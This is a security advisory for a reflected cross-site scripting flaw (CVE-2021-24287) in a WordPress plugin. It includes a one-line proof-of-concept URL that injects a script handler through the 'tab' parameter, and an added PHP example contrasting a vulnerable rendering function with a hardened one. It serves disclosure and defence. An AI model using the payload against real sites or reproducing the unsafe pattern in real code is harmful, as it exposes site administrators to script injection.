WordPress Select All Categories And Taxonomies plugin version 1.3.1 suffers from a cross-site scripting vulnerability.
advisories | CVE-2021-24287
# Exploit Title: WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)
# Date: 2/15/2021
# Author: 0xB9
# Software Link: https://downloads.wordpress.org/plugin/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons.1.3.1.zip
# Version: 1.3.1
# Tested on: Windows 10
# CVE: CVE-2021-24287

1. Description:
The tab parameter in the Admin Panel is vulnerable to XSS.
2. Proof of Concept:
wp-admin/options-general.php?page=moove-taxonomy-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
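
The likely shape of the flaw and its fix, as an added example (not the plugin's source, which this page does not show). It assumes the tab value is echoed into a double-quoted HTML attribute, which is what the quote-led payload suggests; the function names, markup and tab allowlist are hypothetical.

```php
<?php
// Added illustration, not the plugin's source. Function names, markup and
// the tab allowlist are hypothetical.

// Vulnerable pattern: request value concatenated into a double-quoted attribute.
function render_tab_unsafe(string $tab): string {
    return '<input type="hidden" name="tab" value="' . $tab . '">';
}

// Hardened pattern: allowlist the tab slug, then escape for attribute context.
// Under WordPress, esc_attr() is the escaping call; htmlspecialchars() stands
// in for it here so the script runs without WordPress loaded.
const ALLOWED_TABS = ['general', 'documentation']; // hypothetical slugs

function render_tab_safe(string $tab): string {
    if (!in_array($tab, ALLOWED_TABS, true)) {
        $tab = ALLOWED_TABS[0]; // unknown tab: fall back to the default
    }
    return '<input type="hidden" name="tab" value="'
        . htmlspecialchars($tab, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '">';
}

// Attribute names an HTML parser sees on the rendered <input> element.
function attribute_names(string $html): array {
    libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    $names = [];
    foreach ($doc->getElementsByTagName('input')->item(0)->attributes as $attr) {
        $names[] = $attr->name;
    }
    return $names;
}

// Query string from the proof of concept above; parse_str() URL-decodes it.
parse_str('page=moove-taxonomy-settings&tab="+style=animation-name:rotation'
    . '+onanimationstart="alert(/XSS/);', $query);

foreach (['render_tab_unsafe', 'render_tab_safe'] as $render) {
    $html = $render($query['tab']);
    echo $render, ': ', $html, "\n  attributes: ",
        implode(', ', attribute_names($html)), "\n";
}
```

Any attribute listed beyond type, name and value was supplied by the request rather than by the template.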